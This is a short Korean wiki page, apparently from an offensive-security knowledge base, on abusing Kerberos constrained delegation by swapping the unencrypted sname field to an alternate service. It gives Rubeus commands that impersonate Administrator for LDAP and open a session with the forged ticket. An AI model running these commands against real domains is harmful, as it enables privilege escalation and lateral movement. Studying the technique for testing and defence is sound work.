Alternate Service Name

커버로스 인증에서 sname 필드는 암호화 되지 않기 때문에 조작할 수 있습니다. 특히 Constrained Delegation에서 특정 머신이나 사용자 계정을 통해 다른 사용자의 티켓을 요청할 수 있는 환경에서, 의도대로 위임된 서비스 외의 다른 서비스에 대해서도 가장할 수 있습니다.

# 위임받은 CIFS 서비스 대신 LDAP 서비스에 대한 티켓으로 변경 요청
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:TestService /altservice:ldap /user:wiki /ticket:doI[...skip...]U8= /nowrap

# LDAP 서비스 티켓을 통한 세션 생성
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:wiki /password:FakePass /ticket:doI[...]mlv

PreviousConstrained Delegation NextResource Based Constrained Delegation

Last updated 6 days ago

Was this helpful?